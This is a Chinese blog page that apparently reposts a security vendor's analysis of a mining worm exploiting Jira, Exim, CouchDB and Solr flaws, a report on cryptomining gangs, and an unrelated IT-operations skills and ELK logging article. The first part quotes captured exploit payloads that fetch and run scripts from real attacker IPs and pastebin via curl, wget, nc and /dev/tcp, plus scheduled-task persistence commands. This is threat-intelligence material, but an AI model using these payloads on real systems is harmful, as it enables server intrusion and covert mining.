目前,尚不清楚此团伙是否已经具备任意代码执行的能力,但由于该漏洞影响大部分开启远程桌面服务的Windows版本且危害极大,因此需要谨慎提防该漏洞利用的大规模到来。

2. JIRA模板注入RCE [CVE-2019-11581]

Atlassian Jira是一个事务与项目跟踪软件,其可以计划、跟踪和管理敏捷软件开发项目。攻击者在最新的蠕虫中,增加了Jira模板注入RCE的相关功能,其利用JIRA联系管理员表单处未授权或具有JIRA管理员访问权限导致的模板注入[4]。恶意程序中内置了此攻击模块,其尝试向secure/ContactAdministrators.jspa与secure/ContactAdministrators!default.jspa发送以下payload:

8payload_jpeg

阿里云安全团队已捕获相关攻击流量,其向目标url注入#set ($cmd=”wget https://pastebin.com/raw/Dj3JTtnj -O /tmp/baby”)命令执行相应的挖矿程序。

9_

同时,攻击者还尝试在此漏洞中,插入Apache Struts 2的漏洞利用方式,试图通过这种”组合拳”的方式,突破目标主机的防御,转码后payload如下:

POST /secure/ContactAdministrators!default.jspa HTTP/1.1
Content-Type: application/xml
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 5650
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator">

除此之外,平台还发现疑似其他团伙使用此漏洞向http://107.174.47.181/mr.sh下载kworkerds挖矿程序,payload如下:

POST /secure/ContactAdministrators.jspa HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.1
Content-Length: 424
Content-Type: application/x-www-form-urlencoded
atl_token=BCGK-NYLC-7KR7-6QGO_50a98ffe7dbf772ae9325186d08a20e190e13aed_lout&[email protected]&details=v&subject=$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('bash -c {echo,Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xODEvbXIuc2ggfCBiYXNoIC1zaA==}|{base64,-d}|{bash,-i}').toString()

可以看到,此漏洞已逐渐被恶意团伙所利用,甚至在恶意团伙之间进行传播,给用户带来更大的安全威胁。因此,阿里云安全团队建议受影响的用户及时修复漏洞,以防攻击面加速扩大以及漏洞利用方式升级。

3. Exim Mail RCE [CVE-2019-10149]

Exim是一款开源邮件传输代理服务器软件,在4.87-4.91版本的Exim中,deliver_message函数未对邮件接收者的地址做限制,导致攻击者可以向本地域localhost或其他本地域发送攻击${run{…}}@localhost形式的payload,执行任意命令[5]。在该蠕虫中,其内置了相关payload:

10payload_jpeg

阿里云安全团队已监测到相关攻击流量,其转码后结果如下图。攻击者正利用此漏洞进行传播,但数量较小,且恶意源较为集中,疑似攻击者还正在进行小范围尝试。

11_

除此之外,阿里云安全团队还监测出其他攻击者也正在使用此漏洞进行尝试,下载恶意程序并写入反弹shell,转码后payload如下:

RCPT TO:<${run{/bin/sh  -c  'mount  -o  remount,exec  /dev/shm; cd  /dev/shm;(wget  http://212.83.186.24:2525/fsflt||(echo  fsflt|nc  -q  1 212.83.186.24 2525)>fsflt||(exec  10<>/dev/tcp/212.83.186.24/2525;echo  fsflt>&10;cat <&10>fsflt))  & sleep 45;setsid sh  fsflt 47.90.89.47 25  trulifeaudio.com'&}}@localhost>

根据Shodan全网扫描结果可以看到,Exim仅4.91版本就有67w台设备,可以预见,此漏洞的影响面极其广泛,建议使用版本在4.87-4.91的用户及时更新组件,以防止不必要的损失。

12_

4. Couchdb RCE [CVE-2018-8007]

Apache CouchDB是一个开源数据库,专注于易用性与web数据库的兼容性。在CVE-2018-8007漏洞中,攻击者可以通过couchDB提供的HTTP API配置获取操作系统用户权限,从而执行恶意指令[6],其向_config/update_notification/index-updater路径PUT发送内容,进而达到任意代码执行的功能。

13_jpeg

阿里云安全团队监测到的此种攻击流量如下图所示:

14_

根据监测的结果显示,目前使用此漏洞进行攻击的流量较少,但此攻击模块内置于恶意程序之中,尚未爆发,仍需谨慎对待,及时修复相关漏洞,以防事态进一步扩大。

5. Solr RCE [CVE-2017-12629]

Apache Solr是开源企业搜索平台,主要包括全文搜索、动态聚类、富文本处理等功能。该蠕虫利用SolrCloud Collections API,在config字段中传入solr.RunExecutableListener,从而达到任意命令执行的操作[7]。该蠕虫在内部内置了相关攻击模块,如下:
阿里云安全团队监测到的恶意流量payload如下:

POST /solr/query_solr/config HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Content-Type: application/json
Content-Length: 211

{"create-listener": {"exe": "sh", "name": "newlistener-036", "args": ["-c", "nohup bash -c (curl -fsSL https://pastebin.com/raw/yS3fAEBN||wget -q -O- https://pastebin.com/raw/yS3fAEBN)|base64 -d|bash
"], "event": "newSearcher", "class": "solr.RunExecutableListener", "dir": "/bin/"}}

该蠕虫涉及使用的其他3种漏洞:Nexus Repository Manager[1]、Redis[8]与Jenkins[9]远程代码执行在阿里云安全团队的其他文章中已经进行了详细的分析,遭受相关漏洞困扰的用户,可以根据相关文章的安全建议进行修复,在这里不再赘述。

涉及漏洞

16_

IOC

MD5
natstat: bc7a55426cd26a431879fbb9ea36c42d
URL

安全建议

  • 由于涉及多个组件,使用相关组件的用户建议及时更新相关组件至最新版本
  • 建议使用阿里云安全的下一代云防火墙产品,集中管理公网IP的访问策略,其内置威胁入侵防御模块(IPS),支持失陷主机检测、主动外联行为的阻断,还可根据需求,灵活、快速、高效地更改配置防御规则,保证业务稳定安全运行。
  • 若您关注自身业务网络安全但却无从下手,推荐使用阿里云安全管家服务,其为您配备具有多年云上安全最佳实践经验的安全专家,提供7×24小时的服务响应级别,保障网络及重要系统在任何时间发生任何安全问题都能够及时得到支持和救援。

相关文章

[1] Nexus Repository Manager 3新漏洞已被用于挖矿木马传播,建议用户尽快修复
[2] Remote Desktop Services Remote Code Execution Vulnerability
[3] 美国Immunity公司公开售卖Bluekeep漏洞利用
[4] JIRA Security Advisory 2019-07-10
[5] Exim 远程代码执行漏洞
[6] CVE-2018-8007: Apache CouchDB Remote Code Execution
[7] Apache Solr 7.0.1 – XML External Entity Expansion / Remote Code Execution
[8] Watchdogs利用Redis实施大规模挖矿,常见数据库蠕虫如何破?
[9] Jenkins RCE漏洞成ImposterMiner挖矿木马新”跳板”

网络黑产团伙在入侵服务器挖矿的变现手段

吃肉的兔子阅读(127)评论(0)

尽管加密货币的价格在2018年经历了暴跌,但挖矿仍是网络黑产团伙在入侵服务器之后最直接的变现手段,越来越多的0-Day/N-Day漏洞在公布后的极短时间内就被用于入侵挖矿,黑产团伙利用漏洞发起攻击进行挖矿的趋势仍将持续。

以下是报告部分内容,下载报告完整版:
https://yq.aliyun.com/download/3312

攻击态势分析

【热点0-Day/N-Day漏洞利用成为挖矿团伙的”武器库”,0-Day漏洞留给用户进行修复的窗口期变短】

2018年,多个应用广泛的web应用爆出高危漏洞,对互联网安全造成严重威胁。事后安全社区对漏洞信息的分析和漏洞细节的分享,让利用代码能够方便的从互联网上获取。挖矿团伙自然不会放过这些唾手可得的“武器库”。此外一些持续未得到普遍修复的N-Day漏洞往往也会被挖矿团伙利用。本报告梳理了部分热点0-Day/N-Day漏洞被挖矿团伙大量利用的事件。

同时阿里云观察到,0-Day漏洞从披露到大规模利用之间的时间间隔越来越小。因此在高危0-Day漏洞爆出后未能及时修复的用户,容易成为恶意挖矿的受害者。

【非Web网络应用暴露在公网后成为挖矿团伙利用的重灾区】

企业对Web应用可能造成的安全威胁已经有足够的重视,WAF、RASP、漏洞扫描等安全产品也提升了Web应用的安全水位。而非Web网络应用(Redis、Hadoop、SQLServer等)往往并非企业核心应用,企业在安全加固和漏洞修复上投入并不如Web应用,往往导致高危漏洞持续得不到修复,因而挖矿团伙也会针对性利用互联网上这些持续存在的弱点应用。本报告梳理了2018年非Web网络应用漏洞被挖矿团伙利用的时间线。

【挖矿团伙广泛利用暴力破解进行传播,弱密码仍然是互联网面临的主要威胁】

下图为不同应用被入侵导致挖矿所占百分比,可以发现SSH/RDP/SQLServer是挖矿利用的重点应用,而这些应用通常是因为弱密码被暴力破解导致被入侵感染挖矿病毒。由此可以看出弱密码导致的身份认证问题仍然是互联网面临的重要威胁。

_

恶意行为

【挖矿后门普遍通过蠕虫形式传播】

大多数的挖矿团伙在感染受害主机植入挖矿木马后,会控制这些受害主机对本地网络及互联网的其他主机进行扫描和攻击,从而扩大感染量。这些挖矿木马传播速度较快,且很难在互联网上根除,因为一旦少量主机受到恶意程序感染,它会受控开始攻击其他主机,导致其它带有漏洞或存在配置问题的主机也很快沦陷。

少量挖矿团伙会直接控制部分主机进行网络攻击,入侵受害主机后只在主机植入挖矿后门,并不会进一步扩散。最有代表性的就是8220挖矿团伙。这类团伙一般漏洞利用手段比较丰富,漏洞更新速度较快。

【挖矿团伙会在受害主机上通过持久化驻留获取最大收益】

大多数的挖矿团伙,都会尝试在受害主机上持久化驻留以获取最大收益。

通常在Linux系统中,挖矿团伙通过crontab设置周期性被执行的指令。在Windows系统中,挖矿团伙通常使用schtask和WMI来达到持久化的目的。

如下为Bulehero木马执行添加周期任务的schtask命令:

cmd /c schtasks /create /sc minute /mo 1 /tn "Miscfost" /ru system /tr "cmd /c C:\Windows\ime\scvsots.exe"
cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls C:\Windows\scvsots.exe /p everyone:F"

【挖矿团伙会通过伪装进程、加壳、代码混淆、私搭矿池或代理等手段规避安全分析和溯源】

Bulehero挖矿网络使用的病毒下载器进程名为scvsots.exe,与windows正常程序的名字svchost.exe极其相似;其它僵尸网络使用的恶意程序名,像taskhsot.exe、taskmgr.exe、java这类形似正常程序的名称也是屡见不鲜。

在分析挖矿僵尸网络的过程中我们发现,大多数后门二进制程序都被加壳,最经常被使用的是Windows下的UPX、VMP、sfxrar等,如下图,几乎每个RDPMiner使用的恶意程序都加了上述三种壳之一。

detec

此外,挖矿团伙使用的恶意脚本往往也经过各种混淆。如下图,JBossMiner挖矿僵尸网络在其vbs恶意脚本中进行混淆加密。

_

尽管人工分析时可以通过多种手段去混淆或解密,但加密和混淆对逃避杀毒软件而言,仍是非常有效的手段。

恶意挖矿团伙使用自己的钱包地址连接公开矿池,可能因为矿池收到投诉导致钱包地址被封禁。挖矿团伙倾向于更多的使用矿池代理或私搭矿池的方式进行挖矿。进而安全研究人员也难以通过矿池公布的HashRate和付款历史估算出被入侵主机的数量和规模。

主流团伙概述

1.DDG挖矿团伙

从2017年底首次被曝光至今,DDG挖矿僵尸网络一直保持着极高的活跃度。其主要恶意程序由go语言写成,客观上对安全人员研究分析造成了一定阻碍。而频繁的程序配置改动、技术手段升级,使它堪称2018年危害最大的挖矿僵尸网络。

DDG

DDG(3019)各模块结构功能

2.8220挖矿团伙

在诸多挖矿僵尸网络中,8220团伙的挖矿木马独树一帜,因为它并未采用蠕虫型传播,而是直接对漏洞进行利用。

这种方式理论上传播速度较慢,相较于蠕虫型传播的僵尸网络也更难存活,但8220挖矿团伙仍以这种方式获取了较大的感染量。

_1

挖矿网络结构

3.Mykings(theHidden)挖矿团伙

Mykings(又名theHidden“隐匿者”)挖矿网络在2017年中就被多家友商提及并报道。它从2014年开始出现,时至今日该僵尸网络依然活跃,可以说是拥有非常旺盛的生命力。该僵尸网络极为复杂,集成了Mirai、Masscan等恶意程序的功能,此外在payload、BypassUAC部分都使用极其复杂的加密混淆技术,掩盖攻击意图,逃避安全软件的检测和安全研究人员的分析。该挖矿僵尸网络在11月底更是被发现与“暗云”联手,危害性再次增强。

_2

挖矿网络结构

4.Bulehero挖矿团伙

_3

挖矿网络结构

5.RDPMiner挖矿团伙

该挖矿僵尸网络自2018年10月开始蔓延,之后多次更换挖矿程序名称。

_4

挖矿网络结构

6.JbossMiner挖矿团伙

阿里云安全团队于2018年3月报道过,从蜜罐中捕获到JbossMiner的恶意程序样本,该样本由py2exe打包,解包反编译后是一套由Python编写的完整攻击程序,包含源码及依赖类库等数十个文件。且对于Windows和Linux系统的受害主机,有不同的利用程序。

_5

挖矿网络结构

7.WannaMine

WannaMine是一个蠕虫型僵尸网络。这个挖矿团伙的策略曾被CrowdStrike形容为“靠山吃山靠水吃水”(living off the land),因为恶意程序在被感染的主机上,首先会尝试通过Mimikatz收集的密码登录其他主机,失败之后再利用“永恒之蓝”漏洞攻击其他主机,进行繁殖传播。

_6

挖矿网络结构

8.Kworkerd

这是一个主要攻击Redis数据库未授权访问漏洞的挖矿僵尸网络,因其将挖矿程序的名字伪装成Linux正常进程Kworkerd故得名。

该木马只利用一种漏洞却仍有不少感染量,说明数据库安全配置亟待得到用户的重视。

9.DockerKiller

随着微服务的热度不断上升,越来越多的企业选择容器来部署自己的应用。而Docker作为实现微服务首选容器,在大规模部署的同时其安全性却没有引起足够的重视。2018年8月,Docker配置不当导致的未授权访问漏洞遭到挖矿团伙的批量利用。

_7

挖矿网络结构

安全建议

如今尽管币价低迷,但由于经济形势承受下行的压力,可能为潜在的犯罪活动提供诱因。阿里云预计,2019年挖矿活动数量仍将处于较高的水位;且随着挖矿和漏洞利用相关知识的普及,恶意挖矿的入场玩家可能趋于稳定且伴有少量增加。

基于这种状况,阿里云安全团队为企业和个人提供如下安全建议:

  • 安全系统中最薄弱的一环在于人,最大的安全问题也往往出于人的惰性,因此弱密码、爆破的问题占了挖矿原因的半壁江山。无论是企业还是个人,安全意识教育必不可少;
  • 0-Day漏洞修复的窗口期越来越短,企业需要提升漏洞应急响应的效率,一方面是积极进行应用系统更新,另一方面是关注产品的安全公告并及时升级,同时也可以选择购买安全托管服务提升自己的安全水位;
  • 伴随着云上弹性的计算资源带来的便利,一些非Web类的网络应用暴露的风险也同步上升,安全运维人员应该重点关注非Web类的应用伴随的安全风险,或者选择购买带IPS功能的防火墙产品,第一时间给0-Day漏洞提供防护。

2019年最新最全IT运维技能学习图谱

吃肉的兔子阅读(146)评论(0)

运维是一个融合多学科(网络、系统、开发、安全、应用架构、存储等)的综合性技术岗位,从最初的网络管理(网管)发展到现在的系统运维工程师、网络运维工程师、安全运维工程师、运维开发工程师等,可以看出,运维的分工一直在细化,并且对综合技能要求越来越高,可以看出,未来运维的发展趋势是高、精、尖,高表示高度,精表示精通,尖表示尖端,也就是运维职场一定要站在一定的技术高度,在多个技术领域中,要精通某项技能,同时对尖端前沿技术一定要能掌控趋势。

一、运维职位的发展和趋势

根据不同的运维领域和技术面以及分工流程三个方面来了解下2019年运维职位的发展趋势。

1、按领域来划分

1)、基础设施运维:IDC/网络运维、服务器/存储设备运维
2)、系统运维:系统中间件运维、云计算平台运维
3)、数据运维:数据库运维、大数据技术平台运维
4)、应用运维:应用软件系统
5)、云平台运维:公有云平台运维
6)、容器运维:基于容器服务的运维

2、按技术切面来分

1)、安全运维
2)、性能运维
3)、数据运维
4)、集成运维

3、按流程来划分

1)、构建/持续集成、发布
2)、安装部署、升级、迁移、合并、扩展
3)、配置、初始化、配置变更
4)、备份、传输、恢复
5)、日志、监控、预警
6)、诊断排查、优化

二、系统运维技能图谱

系统运维是运维的基础,新的一年中,对基础运维技能要求也在提高,打好系统运维基础,才能深入学习后面的各种运维技能。

下图列出了系统运维要掌握的必备技能:

640?wx_fmt=png

三、web运维技能图谱

web运维是运维岗位中岗位最多的一个,薪资也相对较高,但需要掌握的知识点也比较多,新的技能要掌握,老的运维技能也不能丢,下图列出了web运维要掌握的各种必备技能。

640?wx_fmt=png

四、大数据运维技能图谱

大数据从2017年开始逐渐走到生活的各个角落,2018年在逐渐落地,而在2019年,大数据依然火热,加上国家对大数据产业的扶持,大数据产业在新的一年岗位需求一定会更加大,因此掌握大数据运维技能,就走在了运维的前沿,下图列出了大数据运维要掌握的各种必备技能。

640?wx_fmt=png

五、容器运维技能图谱

容器的产生,是一次IT行业的革命,2015 年到 2016 年,是业界普遍认为的容器技术爆发的一年,短短一年多时间里,容器技术在中国大陆完成了从零星概念到烽火燎原的壮举。

时至今日,容器技术在国内大多数企业中落地已成为一种共识,而国内的生态系统,也呈现出了企业产品、开源社区和公有云齐头并进的良好局面。因此,2019年也是容器继续快速落地的一年,下图列出了大数据运维要掌握的各种必备技能。

640?wx_fmt=png

六、数据为王的时代

万丈高楼平地起,高楼稳不稳取决于地基是否扎实。运维数据便是运维管理这座高楼的地基。运维数据大致分为CMDB、日志、生产DB、知识库四个方面。

  • CMDB中文是配置管理数据库,存储与管理企业IT架构中设备的各种配置信息,主要是IT资产管理信息。
  • 日志数据保护了企业服务器上运行的各种系统产生的应用日志,系统日志、设备日志、数据库日志等数据,这部分数据是企业数据的核心。
  • DB数据主要是所有IT系统的数据库信息,包括运维管理系统本身的数据库,数据库包含生产数据库、测试数据库、开发数据库三种类型。
  • 知识库主要存储日常开发、测试、运维管理中发生的事件、问题以及一些经典问题的解决和常用的解决方案,主要起到运维管理辅助的功能。

对数据的维护和管理只管重要,特别是日志数据,对运维来说,通过日志可以比较准确全面地知道系统或是设备的运行情况,可以返查问题产生的原因,还原问题发生的整个过程。通过日志也可以提前预测系统可能要发生的问题或是故障,如系统安全日志,如果网络攻 击会在系统安全日志中有一定的体现。

下面简单介绍下,运维重点收集的日志数据有哪些部分以及用途。

1、系统日志

系统日志主要指的是操作系统的日志,主要在/var/log下的各种日志信息。包含系统操作日志、系统安全日志、定时任务日志等。系统日志是运维管理安全模块中审计的重要依据。一般默认的操作系统日志不能满足要求,需要对系统的参数进行修改,如为history命令加上时间戳、IP,并且长久保留历史等功能。并且对日志文件进行处理,不允许用户进行清空命令,只能追加。

2、应用日志

应用日志主要记录应用服务的健康运行情况以及业务操作的具体日志两部分。应用监控运行情况反应应用服务的健康状态,如果应用占用CPU或是内存过高或是忽高忽低不定,都可以通过分析应用日志结合业务操作日志得出结论。业务操作日志可以为业务审计提供主要依据。有一些系统喜欢把业务操作日志写到数据库中,这个也是需要注意的。不过不管在哪个地方,要求是不可缺少的,它为以后业务审计和问题返查提供依据。

3、数据库日志

数据库日志主要反馈数据库的运行情况。通过监控和管理数据库的日志,及时了解数据库的运行情况,遇到问题及时解决等。可以通过数据库日志结合数据库系统自带的数据库如Oracle的系统视图v$开头,MySQL的performance_schema等。虽然数据库的一些信息不是存在日志中而是在数据库里面,但是也可以作为数据库日志的一部分进行管理和监控,已便我们及时知道数据库的监控状况,从而预防可能出现的问题。

4、设备日志

设备日志一般是一个比较容易忽略的地方,但设备日志往往可以反映设备的运行情况。交换机故障,防火墙故障等设备故障都可能引起大面积的系统和服务故障。所以设备日志一定要收集,分析和监控预警。常用的设备日志有交换机日志、防火墙日志、网络安全设备日志等。

这么多的日志,运维要通过各种手段完成日志的收集、过滤分析、可视化展示,那么如何实现这些功能呢,方法很多,例如ELK集成套件(Elasticsearch , Logstash, Kibana)就可以轻松实现日志数据的实时收集、分析传输以及图形化展示。

  • Elasticsearch是个开源分布式搜索引擎,提供搜集、分析、存储数据三大功能。它的特点有:分布式,零配置,自动发现,索引自动分片,索引副本机制,restful风格接口,多数据源,自动搜索负载等。
  • Logstash主要是用来日志的搜集、分析、过滤日志的工具,支持大量的数据获取方式。一般工作方式为c/s架构,client端安装在需要收集日志的主机上,server端负责将收到的各节点日志进行过滤、修改等操作在一并发往elasticsearch上去。
  • Kibana 也是一个开源和免费的工具,Kibana可以为 Logstash 和 ElasticSearch 提供的日志分析友好的 Web 界面,可以帮助汇总、分析和搜索重要数据日志。

另外,还有Filebeat可以替换Logstash作为日志收集工具,Filebeat隶属于Beats。目前Beats包含四种工具:

Packetbeat(搜集网络流量数据)
Topbeat(搜集系统、进程和文件系统级别的 CPU 和内存使用情况等数据)
Filebeat(搜集文件数据)
Winlogbeat(搜集Windows事件日志数据)

可以看到,Beats涵盖了所有收集日志数据的各个方面。

那么要如何使用ELK呢,根据日志量的不同,对应的ELK架构也不尽相同,看下面几个常见架构:

640?wx_fmt=png

此架构主要是将Logstash部署在各个节点上搜集相关日志、数据,并经过分析、过滤后发送给远端服务器上的Elasticsearch进行存储。Elasticsearch再将数据以分片的形式压缩存储,并提供多种API供用户查询、操作。用户可以通过Kibana Web直观的对日志进行查询,并根据需求生成数据报表。
此架构的优点是搭建简单,易于上手。缺点是Logstash消耗系统资源比较大,运行时占用CPU和内存资源较高。另外,由于没有消息队列缓存,可能存在数据丢失的风险。此架构建议供初学者或数据量小的环境使用。

由此衍生出来了第二种架构:

640?wx_fmt=png

此架构主要特点是引入了消息队列机制,位于各个节点上的Logstash Agent(一级Logstash,主要用来传输数据)先将数据传递给消息队列(常见的有Kafka、Redis等),接着,Logstash server(二级Logstash,主要用来拉取消息队列数据,过滤并分析数据)将格式化的数据传递给Elasticsearch进行存储。最后,由Kibana将日志和数据呈现给用户。由于引入了Kafka(或者Redis)缓存机制,即使远端Logstash server因故障停止运行,数据也不会丢失,因为数据已经被存储下来了。

这种架构适合于较大集群、数据量一般的应用环境,但由于二级Logstash要分析处理大量数据,同时Elasticsearch也要存储和索引大量数据,因此它们的负荷会比较重,解决的方法是将它们配置为集群模式,以分担负载。

此架构的优点在于引入了消息队列机制,均衡了网络传输,从而降低了网络闭塞尤其是丢失数据的可能性,但依然存在Logstash占用系统资源过多的问题,在海量数据应用场景下,可能会出现性能瓶颈。

最后,还有第三种架构:

640?wx_fmt=png

这个架构是在上面第二个架构基础上改进而来的,主要是将前端收集数据的Logstash Agent换成了filebeat,消息队列使用了kafka集群,然后将Logstash和Elasticsearch都通过集群模式进行构建,此架构适合大型集群、海量数据的业务场景,它通过将前端Logstash Agent替换成filebeat,有效降低了收集日志对业务系统资源的消耗。同时,消息队列使用kafka集群架构,有效保障了收集数据的安全性和稳定性,而后端Logstash和Elasticsearch均采用集群模式搭建,从整体上提高了ELK系统的高效性、扩展性和吞吐量。

七、用大数据思维做运维监控

大数据分析最早就来源于运维人的日志分析,到逐渐发展对各种业务的分析,人们发现这些数据蕴涵着非常大的价值,通过实时监测、跟踪研究对象在互联网上产生的海量行为数据,进行挖掘分析,揭示出规律性的东西,提出研究结论和对策。这就是大数据的用途。

同样,通过大数据分析,我们可以得到各种指标,例如:

1、在业务层面,如团购业务每秒访问数,团购券每秒验券数,每分钟支付、创建订单等。

2、在应用层面,每个应用的错误数,调用过程,访问的平均耗时,最大耗时,95线等

3、在系统资源层面:如cpu、内存、swap、磁盘、load、主进程存活等

4、在网络层面: 如丢包、ping存活、流量、tcp连接数等

而这些指标,刚好是运维特别需要的东西。通过大数据分析出的这些指标,可以解决如下方面的问题:

系统健康状况监控
查找故障根源
系统瓶颈诊断和调优
追踪安全相关问题

那么如何用大数据思维做运维呢,大数据架构上的一个思维就是:提供一个平台让运维方便解决这些问题, 而不是,让大数据平台去解决出现的问题。

基本的一个大数据运维架构是这样的:

640?wx_fmt=png

对于运维的监控,利用大数据思维,需要分三步走:

获取需要的数据
过滤出异常数据并设置告警阀值
通过第三方监控平台进行告警

所有系统最可靠的就是日志输出,系统是不是正常,发生了什么情况,我们以前是出了问题去查日志,或者自己写个脚本定时去分析。现在这些事情都可以整合到一个已有的平台上,我们唯一要做的就是定义分析日志的的逻辑。

好啦,这就是今天要给大家介绍的新时期核心运维技能啦,抓住时机,开始全新学习吧!

中国IT部落服务于运维技术人员交流分享平台

关于我们联系我们